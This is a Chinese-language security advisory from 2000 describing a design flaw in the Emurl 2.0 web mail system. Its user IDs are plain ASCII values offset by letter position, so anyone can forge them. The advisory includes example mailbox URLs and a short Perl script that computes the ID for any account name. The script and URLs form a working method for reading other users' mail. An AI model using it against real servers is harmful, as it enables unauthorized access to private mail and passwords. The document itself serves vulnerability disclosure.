Emurl 2.0For Windows NT 4.0 存在安全问题发布时间:2000-05-14 更新时间:2000-05-14 严重程度:中 威胁程度:普通用户访问权限 错误类型:设计错误 利用方式:服务器模式 受影响系统 Emurl 2.0For Windows NT 4.0详细描述 Emurl是一个基于WEG的邮件系统,站点地址可以到下面的站点去查看: http://www1.seattlelab.com/emurl/ 在系统上用户和访问MAIL信箱中任何人的内容,用户也可以偷取他们的POP密码。如通过Emurl 软件在我登录我新的MAIL的时候,将显示下面的地址: http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=113100104114116111123 这个地址的一是鉴定你的帐号名,因此,如果你在其他站点上建立一个与一个同名的帐号,所以可以获得相同的鉴别号,如113100104114116111123,但此外,这个鉴别号可以很容易的分解出来ASCII值,如下所示:如果建立一个PBenoit的帐号,鉴别号就为:113100104114116111123. 可以如下分解: p = 112 + 1 = 113 b = 98 + 2 = 100 e = 101 + 3 = 104 n = 110 + 4 = 114 o = 111 + 5 = 116 i = 105 + 6 = 111 t = 116 + 7 = 123 这样以后,你就可以使用下面的方法获取这个鉴别号的MAIL地址: http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER= 或者来改变帐号的设定: http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER= 测试代码 见上所述。下面是一个perl程序,可以根据鉴别号来生成ASCII帐号: print "Enter your ID: "; $_=lc(); chomp; print "Your identifier is: "; @letters=split(//, $_); for ($i = 0; $i < length($_); $i++) { $mychar = ord($letters[$i])+$i+1; if ($mychar < 100) { $mychar = (0).$mychar;} print $mychar } 解决方案 SeattleLab将发布下一个版本的EMURL 。 相关信息 |
